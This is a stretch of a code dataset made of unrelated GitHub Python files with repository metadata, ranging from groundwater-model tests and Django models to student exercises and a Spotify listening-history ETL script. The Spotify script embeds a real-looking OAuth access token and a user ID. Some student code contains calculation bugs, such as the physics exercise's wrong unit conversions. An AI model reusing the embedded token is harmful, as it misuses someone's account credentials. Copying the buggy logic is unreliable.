variables.append('idomain')\n outfiles = export(m, grid, package='dis', output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef get_nlay(model):\n if model.version == 'mf6':\n nlay = model.dis.nlay.array\n else:\n nlay = model.dis.nlay\n return nlay\n\n\ndef get_nrow_ncol_nlay_nper(model):\n if model.version == 'mf6':\n nlay = model.dis.nlay.array\n nrow = model.dis.nrow.array\n ncol = model.dis.ncol.array\n nper = model.nper\n else:\n nrow, ncol, nlay, nper = model.nrow_ncol_nlay_nper\n return nrow, ncol, nlay, nper\n\n\ndef test_variables_export(model):\n m, grid, output_path = model\n variables = ['top', 'thickness']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid,\n variables=variables,\n output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_variable_export(model):\n # if 'package' is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['botm']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable='botm', output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_transient2d_bar_graph(model):\n # if 'package' is argued instead of 'packages'\n m, grid, output_path = model\n variables = ['recharge']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable=variables, output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_export_irch(shellmound):\n m, grid, output_path = shellmound\n variables = ['irch']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid, variable='irch', output_path=output_path)\n n_unique_pers = len(set(m.rch.irch.array.sum(axis=(1, 2, 3))))\n # should be a pdf and tif for each unique period\n assert len(outfiles) == n_unique_pers * 2\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_variable_export_with_package(model):\n m, grid, output_path = model\n variables = ['botm']\n packages = ['dis']\n layers = list(range(get_nlay(m)))\n outfiles = export(m, grid,\n packages=packages,\n variables=variables,\n output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n\n\ndef test_summary(model):\n m, grid, output_path = model\n df = summarize(m, output_path=output_path)\n # TODO : add some checks\n assert True\n\n\ndef test_package_list_export(model):\n m, grid, output_path = model\n packages = ['dis', 'rch'] #, 'wel']\n variables = ['botm', 'top', 'thickness', 'idomain', 'rech', 'recharge'] #, 'wel']\n if m.version == 'mf6':\n variables.append('irch')\n nrow, ncol, nlay, nper = get_nrow_ncol_nlay_nper(m)\n layers = list(range(nlay))\n outfiles = []\n for package in packages:\n outfiles += export(m, grid, package, output_path=output_path)\n check_files(outfiles, variables, layers=layers)\n tifs = [f for f in outfiles if f.endswith('.tif')]\n for f in tifs:\n with rasterio.open(f) as src:\n assert src.width == ncol\n assert src.height == nrow\n compare_polygons(grid.bbox, box(*src.bounds))\n shps = [f for f in outfiles if f.endswith('.shp')]\n for f in shps:\n with fiona.open(f) as src:\n assert box(*src.bounds).within(grid.bbox)\n\n\ndef test_transient_list_export(model):\n m, grid, output_path = model\n outfiles = export(m, grid, 'wel', output_path=output_path)\n variables = ['wel0_stress_period_data']\n if m.version != 'mf6':\n variables = ['wel_stress_period_data']\n check_files(outfiles, variables=variables)\n df = mftransientlist_to_dataframe(m.wel.stress_period_data, squeeze=True)\n df.index = range(len(df))\n if 'cellid' in df.columns:\n df['cellid'] = df['cellid'].astype(str)\n df2 = shp2df(outfiles[0]).drop('geometry', axis=1)\n numeric_cols = [c for c in df.columns if is_numeric_dtype(df[c].dtype)]\n assert np.allclose(df[numeric_cols], df2[numeric_cols])\n\n\ndef test_export_sfr(model):\n m, grid, output_path = model\n # mf2005 style SFR export not implemented yet\n # TODO: implement mf2005 sfr package export\n if m.version != 'mf6':\n return\n outfiles = export(m, grid, 'sfr', output_path=output_path)\n # TODO: finish this test\n variables = ['shellmound.sfr']\n if m.version != 'mf6':\n variables = ['wel_stress_period_data']\n df = pd.DataFrame(m.sfr.reach_data.array)\n compare_cols = ['strtop']\n else:\n df = pd.DataFrame(m.sfr.packagedata.array)\n compare_cols = ['rlen', 'rwid', 'rgrd', 'rtp', 'rbth', 'rhk']\n check_files(outfiles, variables=variables)\n df.index = range(len(df))\n if 'cellid' in df.columns:\n df['cellid'] = df['cellid'].astype(str)\n df2 = shp2df(outfiles[0]).drop('geometry', axis=1)\n df2['cellid'] = list(zip(df2['k'], df2['i'], df2['j']))\n df2['cellid'] = df2['cellid'].astype(str)\n assert np.allclose(df[compare_cols], df2[compare_cols])","repo_name":"aleaf/modflow-export","sub_path":"mfexport/tests/test_model_export.py","file_name":"test_model_export.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"40620596491","text":"n = int(input())\na = list(map(int, input().split()))\nma, mi = a[0], a[0]\nans1, ans2 = 0, 0\nfor v in a:\n if v > ma:\n ans1 += 1\n ma = v\n if v < mi:\n ans2 += 1\n mi = v\nprint(ans1, ans2)","repo_name":"wiwitrifai/competitive-programming","sub_path":"hackerrank/university-codesprint-2/breaking.py","file_name":"breaking.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"86737707380","text":"print(\"\\n\\t\\tA partir dos valores da aceleração (a em m/s2), da velocidade inicial (v0 em m/s)\" +\n \"\\n\\t\\te do tempo de percurso (t em s). Calcular e exibir a velocidade final de automóvel em km/h.\")\n\naceleracao = float(input(\"\\n\\n\\t\\tDigite a aceleração do veiculo (em metros por segundo): \"))\nvelocidadeinicial = float(input(\"\\n\\t\\tDigite a velocidade inicial do veiculo (em km por hora): \"))\ntempo = float(input(\"\\n\\t\\tDigite o tempo do percurso do veiculo (em segundos): \"))\n\n# V = v0 + a. t\n\nsegundoconvertido = tempo * 60\naceleracaoconvertida = aceleracao / 3.6\nvelocidadefinal = velocidadeinicial+ (aceleracaoconvertida*segundoconvertido)\n\nif velocidadefinal <= 40:\n print(\"\\n\\t\\tVeiculo muito LENTO.\")\nelif (velocidadefinal > 40) & (velocidadefinal <= 60):\n print(\"\\n\\t\\tVeiculo em velocidade PERMITIDA.\")\nelif (velocidadefinal > 60) & (velocidadefinal <= 80):\n print(\"\\n\\t\\tVeiculo RAPIDO.\")\nelif velocidadefinal > 120:\n print(\"\\n\\t\\tVeiculo MUITO RAPIDO.\")\n","repo_name":"M4NS0/homeworks","sub_path":"Python/Lógica de Programação I/Exercícios/Lista4/exercicio06.py","file_name":"exercicio06.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34414828365","text":"import pygame\nimport os,sys\npygame.init()\n\nSCREENHEIGHT = 480\nSCREENWIDTH = 640\nscreen = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))\npygame.display.set_caption(\"Testing text\")\nbackground = pygame.Surface(screen.get_size())\nbackground = background.convert()\nFonz = pygame.font.Font(None,40)\ncount = 0\ndone = False\nclock = pygame.time.Clock()\nwhile not done:\n clock.tick(30)\n background.fill((255,255,255))\n \n screen.blit(background,(0,0))\n count += 1\n screen.blit(Fonz.render(\"Hello\",True,(0,0,0),(150,255,255)),(count,20))\n pygame.display.flip()\n\npygame.quit()","repo_name":"montepy/PyBullet","sub_path":"TextTesting/TextTesting/TextTesting.py","file_name":"TextTesting.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72604958889","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.io import ascii\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\n\nplt.rcParams['xtick.major.size'] = 9\nplt.rcParams['xtick.major.width'] = 2\nplt.rcParams['xtick.minor.size'] = 6\nplt.rcParams['xtick.minor.width'] = 1\nplt.rcParams['ytick.major.size'] = 9\nplt.rcParams['ytick.major.width'] = 2\nplt.rcParams['ytick.minor.size'] = 6\nplt.rcParams['ytick.minor.width'] = 1\nplt.rcParams['axes.linewidth'] = 2\nplt.rcParams['font.size']=15\nplt.rcParams['mathtext.default']='regular'\nplt.rcParams['lines.markersize']=8\nplt.rcParams['xtick.major.pad']='3'\nplt.rcParams['ytick.major.pad']='3'\nplt.rcParams['ytick.minor.visible'] = 'True'\nplt.rcParams['xtick.minor.visible'] = 'True'\nplt.rcParams['xtick.direction'] = 'inout'\nplt.rcParams['ytick.direction'] = 'inout'\nplt.rcParams['ytick.right'] = 'True'\nplt.rcParams['xtick.top'] = 'True'\n\n# use a color-blind friendly palette\n# orange, red, light blue, dark blue\ncolors=['#FF9408','#DC4D01','#00A9E0','#016795']\n\n#dat=ascii.read('sample/scatter10.csv')\ndat=ascii.read('data/scatter-all.csv')\n#dat=ascii.read('data/scatter-all-fullsecs.csv')\n\nix,un=np.unique(dat['ticids'],return_index=True)\ndat=dat[un]\n\num=np.where(dat['teff'] < 8000.)[0]\nprint(len(um),'unique stars with Teff < 8000K')\n\nplt.ion()\nplt.clf()\n\nfig = plt.figure(figsize=(6, 8))\n\nupl=16\n\nplt.clf()\ngs = gridspec.GridSpec(2, 1)\n\nax0 = plt.subplot(gs[0, 0])\nplt.scatter(dat['teff'],dat['rad'],c=dat['tmags'],marker='o',alpha=1., vmax=upl, cmap='cubehelix',s=12, rasterized=True)\n#plt.legend(loc='best')\n#plt.plot([8000,4000],[5,3.4],ls='dashed',color='royalblue')\nplt.xlim([8000,2700])\nplt.ylim([0.1,200])\nplt.xlabel('Effective Temperature (K)')\nplt.ylabel('Stellar Radius (Solar)')\nplt.yscale('log')\nplt.annotate(\"(a)\", xy=(0.05, 0.1), xycoords=\"axes fraction\",fontsize=24,color='black')\ncbaxes = inset_axes(ax0, width=\"40%\", height=\"5%\", loc=2) \nplt.colorbar(cax=cbaxes, orientation='horizontal', label='Tmag')\n\nax1 = plt.subplot(gs[1, 0])\num=np.where(dat['teff'] < 8000.)[0]\nplt.semilogy(dat['tmags'][um],dat['rad'][um],'.',color=colors[3], rasterized=True)\nplt.xlabel('TESS Magnitude')\nplt.ylabel('Stellar Radius (Solar)')\nplt.xlim([2,16])\nplt.annotate(\"(b)\", xy=(0.05, 0.82), xycoords=\"axes fraction\",fontsize=24,color='black')\n\nplt.subplots_adjust(wspace=0.20,hspace=0.26,left=0.155,right=0.97,bottom=0.08,top=0.98)\n\n#plt.savefig('fig1.png',dpi=150)\n\n\n#plt.savefig('fig-hrd-all-v2.png',dpi=150)\n\n","repo_name":"danxhuber/tess20sec","sub_path":"sample/fig1.py","file_name":"fig1.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24031845312","text":"from unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nfrom click.testing import CliRunner\n\nimport empty_host\nfrom cosmicops.objects.host import CosmicHost, RebootAction\n\n\nclass TestEmptyHost(TestCase):\n def setUp(self):\n co_patcher = patch('cosmicops.empty_host.CosmicOps')\n self.co = co_patcher.start()\n self.addCleanup(co_patcher.stop)\n self.co_instance = self.co.return_value\n\n slack_patcher = patch('cosmicops.log.Slack')\n self.mock_slack = slack_patcher.start()\n self.addCleanup(slack_patcher.stop)\n\n self.runner = CliRunner()\n self.host = CosmicHost(Mock(), {\n 'id': 'h1',\n 'name': 'host1',\n 'resourcestate': 'Enabled'\n })\n self.host.disable = Mock(return_value=True)\n self.host.empty = Mock(return_value=(1, 1, 0))\n self.host.reboot = Mock(return_value=True)\n self.host.set_uid_led = Mock()\n self.co_instance.get_host.return_value = self.host\n\n def test_main(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.co.assert_called_with(profile='config', dry_run=False, log_to_slack=True)\n self.co_instance.get_host.assert_called_with(name='host1')\n self.host.disable.assert_called()\n self.host.empty.assert_called()\n self.host.reboot.assert_not_called()\n self.host.set_uid_led.assert_not_called()\n\n def test_skip_disable(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--skip-disable', 'host1']).exit_code)\n self.host.disable.assert_not_called()\n self.host.empty.assert_called()\n\n def test_disable_failure(self):\n self.host.disable.return_value = False\n\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.host.disable.assert_called()\n\n def test_fail_on_empty_host_response(self):\n self.co_instance.get_host.return_value = []\n\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', 'host1']).exit_code)\n self.co_instance.get_host.assert_called_with(name='host1')\n\n def test_shutdown(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_called_with(RebootAction.HALT)\n self.host.set_uid_led.assert_called_with(True)\n\n def test_shutdown_with_failed_hosts(self):\n self.host.empty.return_value = (2, 1, 1)\n\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_not_called()\n self.host.set_uid_led.assert_not_called()\n\n def test_shutdown_failure(self):\n self.host.reboot.return_value = False\n self.assertEqual(1, self.runner.invoke(empty_host.main, ['--exec', '--shutdown', 'host1']).exit_code)\n self.host.reboot.assert_called_with(RebootAction.HALT)\n\n def test_dry_run(self):\n self.assertEqual(0, self.runner.invoke(empty_host.main, ['host1']).exit_code)\n self.co.assert_called_with(profile='config', dry_run=True, log_to_slack=False)\n","repo_name":"MissionCriticalCloud/cosmicOps","sub_path":"tests/test_empty_host.py","file_name":"test_empty_host.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71823428328","text":"from scripts.helpful_scripts import get_account\nfrom brownie import SimpleStorage\n\n\nimport os\nimport json\nimport yaml\nimport shutil\n\n\ndef deploy_simple_storage(update_front_end=False):\n account = get_account()\n simple_storage = SimpleStorage.deploy({\"from\": account})\n print(f\"Contract deployed at: {simple_storage.address}\")\n\n if update_front_end:\n update_frontend()\n\n\ndef update_frontend():\n # Send the build folder to front-end\n copy_folders_to_front_end(\"./build\", \"./front-end/pages/chain-info\")\n # Send Brownie-config.yaml\n with open(\"brownie-config.yaml\", \"r\") as brownie_config:\n config_dict = yaml.load(brownie_config, Loader=yaml.FullLoader)\n with open(\"./front-end/pages/brownie-config.json\", \"w\") as brownie_config_json:\n json.dump(config_dict, brownie_config_json)\n\n\ndef copy_folders_to_front_end(src, dest):\n if os.path.exists(dest):\n shutil.rmtree(dest)\n shutil.copytree(src, dest)\n\n\ndef main():\n deploy_simple_storage(update_front_end=True)\n","repo_name":"cromewar/Full-Stack-Simple-Storage-Brownie","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28215438224","text":"def computer(a,b,c):\n\tif c == 1:\n\t\tk = a+b\n\t\t#print(\"和:%0.2f\"%k)\n\telif c == 2:\n\t\tk = a-b\n\t\tprint(\"差:%.02f\"%k)\n\telif c == 3:\n\t\tk = a*b\n\t\t#print(\"积:%.02f\"%k)\n\telif c == 4:\n\t\tif b != 0:\n\t\t\tk = a/b\n\t\t\t#print(\"商:%.02f\"%k)\n\t\telse:\n\t\t\t#print(\"输入格式不对\")\n\t\t\tc = \"输入格式不对\"\n\t\t\treturn c\n\treturn k\na = float(input(\"输入一个数\"))\nb = float(input(\"再输入一个数\"))\nc = int(input(\"输入运算符号: 1.和 2.差 3.乘 4.商\"))\nnumber = computer(a,b,c)\nprint(number)\n","repo_name":"superwenqistyle/1803","sub_path":"15day/计算器.py","file_name":"计算器.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41478736036","text":"### In this HashMap Implementation I am handing collision through chaining method ###\nclass HashMap:\n def __init__(self):\n self.max = 10\n self.arr = [[] for i in range(self.max)]\n \n#################### Hash Function ####################\n def get_hash(self, key):\n h = 0\n for char in key:\n h += ord(char) # ord gives us Ascii value of character \n return h % self.max\n\n################# Function to Add Item in HashMap ###################### \n def __setitem__(self,key, val):\n h = self.get_hash(key)\n found = False\n for idx, element in enumerate(self.arr[h]):\n if len(element) == 2 and element[0] == key:\n self.arr[h][idx] = (key,val) \n found = True\n break\n if not found:\n self.arr[h].append((key,val)) \n\n################# Function to Retrieve/Get Item from HashMap ###################### \n def __getitem__(self, key):\n h = self.get_hash(key)\n for element in self.arr[h]:\n if element[0] == key:\n return element[1]\n\n################# Function to Delete Item from HashMap ###################### \n def __delitem__(self, key):\n h = self.get_hash(key)\n for idx,element in enumerate(self.arr[h]):\n if element[0] == key:\n del self.arr[h][idx]\n\n\nh = HashMap()\n\nh[\"march 5\"] = 10 # Adding key,val pair\nh[\"march 6\"] = 12\nh[\"march 17\"] = 14\n\nprint(h[\"march 6\"])\nprint(h[\"march 17\"])\n\ndel h[\"march 17\"] # Deleting\n\nprint(h[\"march 17\"]) # Print after deleting\n\n\n\n","repo_name":"Najaf-Zawar/Data-Structures-Algorithms-DSA-in-Python","sub_path":"#5_HasMap(Chaining).py","file_name":"#5_HasMap(Chaining).py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20383110543","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n\nclass Institute(models.Model):\n name = models.CharField(\"Название института\",\n max_length=400, unique=True)\n description = models.TextField(\"Информация об институте\",\n default=\"None\", blank=True)\n employees_count = models.IntegerField(\"Число сотрудников\",\n default=1)\n scientist_count = models.IntegerField(\"Число молодых учёных\",\n default=0)\n chairman = models.CharField(\"Ф.И.О. председателя СМУ\",\n max_length=200)\n link = models.URLField(\"Ссылка на сайт института\")\n smu_link = models.URLField(\"Ссылка на сайт СМУ института\",\n null=True, blank=True)\n \n def __str__(self):\n return (f\"Institute(id={self.id}, name=\\\"{self.name}\\\", \"\n f\"info=\\\"{self.description[:50]}...\\\", \"\n f\"link=\\\"{self.link}\\\")\")\n\n\nclass Scientist(models.Model):\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n queue = models.OneToOneField(\"moderators.Queue\",\n on_delete=models.SET_NULL, null=True)\n institute = models.ForeignKey(Institute, on_delete=models.CASCADE,\n null=True)\n name = models.CharField(\"Имя учёного\", max_length=200)\n lab = models.CharField(\"Лаборатория\", max_length=300)\n position = models.CharField(\"Должность\", max_length=300)\n degree = models.CharField(\"Учёная степень\", max_length=200,\n null=True)\n scientific_interests = models.TextField(\"Сфера научных интересов\")\n \n def __str__(self):\n return (f\"ScientistInfo(id={self.id}, \"\n f\"institute=\\\"{self.institute.name}\\\", \"\n f\"name=\\\"{self.name}\\\", position=\\\"{self.position}\\\", \"\n \"scientific_interests=\"\n f\"\\\"{self.scientific_interests}\\\")\")\n\n\nclass ScientistLink(models.Model):\n scientist = models.ForeignKey(Scientist,\n on_delete=models.CASCADE)\n link = models.URLField(\"Ссылка на профиль\")\n service_name = models.CharField(\"Краткое описание\", max_length=250)\n\n\nclass Grant(models.Model):\n queue = models.OneToOneField(\"moderators.Queue\",\n on_delete=models.SET_NULL, null=True)\n name = models.CharField(\"Название гранта\", max_length=300)\n description = models.TextField(\"Описание гранта\", null=True)\n end_doc_date = models.DateTimeField(\"Дата окончания приёма заявок\",\n null=True)\n end_result_date = models.DateTimeField(\"Дата подведения итогов\",\n null=True)\n criteria = models.TextField(\"Критерии к участникам\", null=True)\n link = models.URLField(\"Ссылка на страницу с грантом\")\n \n def __str__(self):\n return (f\"Grant(id={self.id}, name=\\\"{self.name}\\\", \"\n f\"end_doc_date=\\\"{self.end_doc_date}\\\", \"\n f\"end_result_date=\\\"{self.end_result_date}\\\")\")\n","repo_name":"Jrol123/SYSC_site","sub_path":"smu_site/apps/info/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21122658731","text":"import constant\nfrom card import HeroClass\nimport logging\nimport multiprocessing\nfrom match_multiprocess import Match\nfrom player.random_player import RandomPlayer\nimport time\nimport numpy\n\n\ndef test_rd_vs_rd_all_fireblast_deck(arg):\n \"\"\" test random vs. random \"\"\"\n match, idx = arg\n return match.play_one_match(idx).name\n\nif __name__ == \"__main__\":\n match_num = 6000\n\n start_health = 30\n deck = constant.mage_fix_deck\n logger = logging.getLogger('hearthstone')\n logger.addHandler(logging.StreamHandler())\n logger.setLevel(logging.WARNING)\n player1 = RandomPlayer(cls=HeroClass.MAGE, name='player1', first_player=True,\n start_health=start_health, fix_deck=deck)\n player2 = RandomPlayer(cls=HeroClass.MAGE, name='player2', first_player=False,\n start_health=start_health, fix_deck=deck)\n # test\n # logger.setLevel(logging.INFO)\n player1.reset(test=True)\n player2.reset(test=True)\n match = Match(player1, player2)\n\n start_time = time.time()\n win_results = []\n p = multiprocessing.Pool()\n for res in p.imap_unordered(test_rd_vs_rd_all_fireblast_deck, [(match, i) for i in range(match_num)]):\n win_results.append(res)\n duration = time.time() - start_time\n\n # print(\"win result:\", win_results)\n print(\"player1 win result:\", numpy.mean(numpy.array(win_results) == \"player1\"))\n print(\"duration:\", duration)","repo_name":"czxttkl/X-AI","sub_path":"useless/AI/play_game_multiprocess.py","file_name":"play_game_multiprocess.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"31099661600","text":"# -*- coding: utf-8 -*-\n\n# The diameter of a tree is the largest path\n# from a leaf to another leaf.\n# i.e: the largest path from one node\n# to another.\n# The common ancestor may not be the root\n\n\nclass Vertex:\n def __init__(self, label, left=None, right=None):\n self.label = label\n self.left = left\n self.right = right\n\n\ndef _tree_diameter(v, heights):\n if v is None:\n return 0\n left = _tree_diameter(v.left, heights)\n right = _tree_diameter(v.right, heights)\n heights[v] = left + right\n return 1 + max(left, right) # return one more edge\n\n\ndef tree_diameter(v):\n heights = {}\n _tree_diameter(v, heights)\n print(list(heights.values()))\n return max(heights.values())\n\n\n# Longest path is from i to m with b as common ancestor,\n# 8 edges\nt1 = Vertex('a',\n Vertex('b',\n Vertex('d',\n Vertex('f'),\n Vertex('g',\n Vertex('h',\n None,\n Vertex('i')))),\n Vertex('e',\n None,\n Vertex('j',\n Vertex('k'),\n Vertex('l',\n Vertex('m'))))),\n Vertex('c'))\n\n\nprint(tree_diameter(t1))\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/05_19_tree_diameter.py","file_name":"05_19_tree_diameter.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71913818089","text":"\"\"\"\r\nRegistration : 012-1111-0461-20\r\nRoll : 203012-21-0008 \r\nDescription : POISSON DISTRIBUTION\r\nAuthor : Chitrak Roychowdhury\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import moment\r\nfrom scipy.special import factorial\r\n\r\n#POISSON DISTRIBUTION\r\n\r\nlamda = 5.0 ;\r\nN = 100000 \r\nP = np.random.poisson(lamda,N);\r\n\r\n#plotting histogram:\r\nn1,bins,patches = plt.hist(P,bins=18,density=True,color='lightgreen',ec='r',label='Poisson Distribution of 100000 \\nrandom numbers')\r\n\r\n#Plotting Poisson distribution for visualisation\r\nplt.plot(bins,(lamda**bins * np.exp(-lamda))/ factorial(bins), linewidth=2, color='k', label='Poisson distribution (Theoretical)')\r\nplt.title('Poisson Distribution')\r\nplt.xlabel('x $ \\longrightarrow $')\r\nplt.ylabel('$P_{poisson}(x)$ $ \\longrightarrow $')\r\nplt.legend()\r\nplt.xlim(-1,18)\r\nplt.grid(True)\r\nplt.show()\r\n\r\n# MOMENTS\r\nK = int(input(\"Calculate moment upto: \"))\r\nfor i in range(1,K+1):\r\n print(\"\\n\\t\\tMoment no: \",i)\r\n moment_no = moment(P,moment = i)\r\n print(\"* mu\",i,\": \",moment_no)\r\n\r\n#Theoretical moment\r\n ThMoment=0\r\n moment_=0\r\n for j in range(1,N):\r\n moment_ = ((P[j]-np.mean(P))**i)/N\r\n ThMoment+=moment_\r\n print(\"* Theoritical value: \",ThMoment)\r\n print( \"* Error =\" , moment_no-ThMoment)\r\n\r\n# CUMULANTS\r\nc1 = moment(P,1)\r\nprint(\"\\n1 st cumulant \",c1)\r\nc2 = np.mean(moment(P,2))-(np.mean(moment(P,1)))**2\r\nprint(\"2 nd cumulant \",c2)\r\nc3 = np.mean(moment(P,3))-(3*(np.mean(moment(P,2))*(np.mean(moment(P,1)))))+(2*np.mean(moment(P,1)**3))\r\nprint(\"3 rd cumulant \",c3)\r\nc4 = np.mean(moment(P,4))-(4*(c3)*(c1))-(3*c2**2)+(12*c2*c1**2)-(6*c1**4)\r\nprint(\"4 th Cumulant \",c4)\r\n","repo_name":"chitrak24/Statistical-Mechanics","sub_path":"Poisson Distribution.py","file_name":"Poisson Distribution.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26820075998","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\ncluster_result = np.zeros(10000)\n\n# 从pickle文件读取降维结果\nwith open(\"./result/part-00000\",\"rb\") as result:\n for i in range(10000):\n line = result.readline()\n cluster_result[i] = int(line)\n\nwith open(\"usdata.pickle\", \"rb\") as usdata:\n data = pickle.load(usdata)\n y = cluster_result[:10000] # 这里,y表示聚类结果(一维向量,list或者numpy.array都可以)\n # y = np.zeros(5000)\n # y = np.append(y, np.ones(5000), 0)\n # y = np.random.randint(0, 5, 10000)\n plt.scatter(data[:, 0], data[:, 1], c=y)\n plt.show()\n","repo_name":"YunFeng0817/bigdata_analyse","sub_path":"lab2/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71536857447","text":"\"\"\"\nExtraction that it allows to get the information of my count of Spotify, show them\nwhat i have listed last 24 hours\n\nThe idea is to create the ETL.\n\"\"\"\n\n#import sqlalchemy\nimport pandas as pd \n#from sqlalchemy.orm import sessionmaker\nimport requests\nimport json\nfrom datetime import datetime\nimport datetime\nimport sqlite3\n\n\nDATABASE_LOCATION = \"\"\n\n# Data user SP\n\nUSER_ID = \"carolina.munozce\"\nTOKEN = \"BQBWr-KU7mV9ZBjdi3FXI2FjEL5_klcUVWUUyZnYtfOcuBL19LyEGJk_F1FUYF2bAF55QoJuNVbipCA05X8SBIsk4_faRkBbiXUHlUV0aL9hicTj5zkuqXZlH-Kxk6tPotm5Nw8XQT3lYkECIpNIZIcK2mZs\"\n\ndef check_if_valid_data(df: pd.DataFrame) -> bool:\n #Check if dataframe is empty. In this case, if we don't listen any music on SP\n if df.empty:\n print(\" No songs download. Finish execution\")\n return False\n\n # Primary key check -> For duplicate data\n if pd.Series(df['played_at']).is_unique:\n pass\n else:\n raise Exception(\"Primary key check is violed\")\n\n # Check any null\n #if df.isnull().values.any():\n # raise Exception(\"Null value found\")\n\n # Check that all timestamps are of yesterday's date\n yesterday = datetime.datetime.now() - datetime.timedelta(days=1)\n yesterday = yesterday.replace(hour=0, minute=0, second=0,microsecond=0)\n\n timestamps = df[\"timestamps\"].tolist()\n for timestamp in timestamps:\n if datetime.datetime.strptime(timestamp,\"%Y-%m-%d\") != yesterday:\n raise Exception(\"At least one of the returned songs does not come fron within the last 24 hours\")\n return True\n\nif __name__ == \"__main__\":\n \n headers = {\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer {token}\".format(token=TOKEN)\n }\n #Convert unix timestamp in milliseconds\n today =datetime.datetime.now()\n yesterday = today - datetime.timedelta(days=1)\n yesterday_unix_timestamp = int(yesterday.timestamp())* 1000\n\n # Get request from SP last 24 hours\n\n r = requests.get(\"https://api.spotify.com/v1/me/player/recently-played?after={time}\".format(time=yesterday_unix_timestamp), headers = headers)\n\n data = r.json()\n # print (data)\n\n song_names = []\n artist_names = []\n played_at_list = []\n timestamps = []\n\n for song in data[\"items\"]:\n song_names.append(song[\"track\"][\"name\"])\n artist_names.append(song[\"track\"][\"album\"][\"artists\"][0][\"name\"])\n played_at_list.append(song[\"played_at\"])\n timestamps.append(song[\"played_at\"][0:10])\n\n song_dict = {\n \"song_name\": song_names,\n \"artist_names\": artist_names,\n \"played_at\": played_at_list,\n \"timestamps\": timestamps\n }\n\n song_df = pd.DataFrame(song_dict, columns= [\"song_name\",\"artist_name\",\"played_at\",\"timestamps\"])\n \n #Validate the song\n if check_if_valid_data(song_df):\n print(\"Data valid, process to Load stage\")\n\n print (song_df)\n\n ","repo_name":"carolinamunozce/spotify_extraction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71681605288","text":"from interface.error import data_no_found\nfrom django.shortcuts import render,redirect,HttpResponse\nfrom user.models import User_Profile,User, Permission\nfrom user_crap.models import user_crap\nfrom .error import data_no_found\nfrom .utily import REQUEST\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.views.decorators.clickjacking import xframe_options_sameorigin\nfrom .models import HOME_PAGE_IMAGE,HOME_PAGE_ARTICALSE\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\n\n\n\n\n# Create your views here\n\n\n\n#1\ndef 